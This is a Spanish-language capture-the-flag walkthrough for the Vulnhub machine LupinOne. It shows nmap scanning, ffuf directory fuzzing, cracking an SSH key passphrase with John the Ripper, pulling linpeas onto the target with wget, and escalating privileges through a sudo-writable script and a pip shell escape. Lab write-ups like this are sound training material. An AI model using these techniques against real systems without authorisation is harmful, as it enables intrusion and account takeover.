Lupin - Vulnhub
https://www.vulnhub.com/entry/empire-lupinone,750/
**ESCANEO DE PUERTOS CON NMAP**
ºnmap -n -sn 192.168.1.0/24 -oG - | awk '/Up$/{print $2}
** Este comando nos permite conocer todos los host activos dentro de una red, para poder recopilar mas informacion dentro de una prueba de pentesting
ºsudo nmap -p- --open -sC -sV -Pn -n -sS -T4 192.168.1.72 -o escaneo_de_puertos
** A través del escaneo encontramos dos puertos abiertos, el 22 y el 80. En el puerto 80 encontramos un directorio llamado "~myfiles", aquí podemos encontrar nuestro vector de ataque.
**FUERZA BRUTA PARA DIRECTORIOS WEB (FUZZING)**
º Para poder buscar mas directorios en la pagina web utilizaremos la herramienta **ffuf**, esta herramienta nos permite hacer ataques de fuerza bruta ante algún sitio web para poder encontrar directorios escondidos, ataque también conocido como Fuzzing.
** ffuf -c -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/common.txt -u 'http://192.168.1.72/~FUZZ'*
** Hemos descubierto un directorio que se denomina "secret", lo buscamos en el navegador para ver su contenido
- Comenta el usuario icex64 que hay otro directorio oculto, asi que procederemos a realizar un ataque fuerza bruta nuevamente con la informacion ya obtenida, con el fin de encontrar un fichero.
**ffuf -c -ic -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.72/~secret/.FUZZ' -fc 403 -e .txt, .html
** Nos dirigimos al archivo "mysecret.txt"
** Encontramos algo con caracteres extraños, vamos a una página que nos puede ayudar a desencriptar el este archivo.
https://www.dcode.fr/cipher-identifier, aquí nos indica que tipo de cifrado tiene, y nos manda que es un base 58, y nos manda una llave RSA nuevamente cifrada para autenticarnos por ssh (Puerto 22).
**ATAQUE DICCIONARIO**
º Guardaremos la llave en un archivo porque vamos a hacerle un ataque diccionario a la llave para saber cual es la contraseña, y poder loguearnos por **ssh**
º Para poder descifrarla tenemos que convertir a llave a un formato que John The Ripper pueda descifrar, ejecutaremos el comando en nuestra terminal "locate ssh2john", para conocer la ruta de la herramienta que usaremos para poder convertir esta llave.
º Para poder usarla nos ubicaremos en en directorio donde hayamos guardado la llave ssh y ejecutamos el siguiente comando:
** Hash es el nombre del archivo que guardamos y "sshkey" es el nombre del archivo con el que guardaremos la respuesta de la herramienta.
º Ahora si procedemos a usar "John The Ripper" contra el archivo cifrado.
** En este caso usaremos el diccionario llamado "fasttrack.txt"
º De esa manera pudimos encontrar la contraseña y ahora si, podemos autenticarnos por ssh con el usuario icex64
** No olvidemos agregar la clave RSA llamado "Hash" (en este caso) para que tengamos una correcta autenticación
º Ya habiéndonos autenticándonos hacemos un listado con el comando "ls" y encontramos la primer bandera.
**ELEVAR PRIVILEGIOS**
º Ya estando dentro de la maquina procederemos a tratar de elevar privilegios a root, para eso miraremos que alcance tenemos con el comando "sudo -l"
** Procederemos a trata de aprovechar esa propiedad para ello descargaremos el primer archivo de la siguiente pagina.
- https://github.com/carlospolop/PEASS-ng/releases/tag/20230508-32e5ab22
- Este archivo nos ayudara a encontrar vulnerabilidades dentro de la maquina en archivo que podamos ejecutar, ahora ya descargando el archivo moveremos a la maquina atacada, para ello abriremos un servidor desde nuestra maquina atacante en python para poder descargar el archivo desde la otra maquina, para ello ejecutaremos el siguiente comando:
- sudo python3 -m http.server
- Es importante ejecutar el comando en donde hayamos guardado el archivo descargado
- Desde la maquina atacada tendremos que descargar el arvhico dentro de la carpeta /temp, para descargarlo ejecutaremos el siguiente comando:
- wget 192.168.1.70:8000/linpeas.sh (Por el puerto 8000 porque en ese esta corriendo el servidor)
-Habiendo cargado el archivo para poder ejecutarlo tenemos que darle los permisos que necesita con el comando "chmod 777 linpeas.sh", despues lo ejecutamos con el comando "./linpeas.sh"
- Habiendo hecho esto pudimos encontrar un directorio que esta dentro de las opciones que nos dio la maquina al ejecutar sudo -l
- Para poder aprovechar la vulnerabilidad editaremos el archivo con nano, y al final le pondremos el siguiente codigo para poder obtener una reverse shell
(Esto va al principio del código)
(Esto va al final del código)
- Guardamos el archivo, y ejecutamos de la siguiente manera:
- Al ejecutar esto nos cambia de usuario a "arsene"
- Al estar como "arsene" y ejecuando el comando 'sudo -l' encontramos que tenemos pip para poder elevar a usuario root
- Desde ahí podemos vulnerar para poder acceder como root, para ellos nos iremos a la siguiente pagina `https://gtfobins.github.io/gtfobins/pip/#shell`
Ahí podremos encontrar los comandos que necesitamos para explotar esa vulnerabilidad
- Los ejecutamos en nuestra terminal y pasaremos a ser usuarios root
PWNED!!!!!!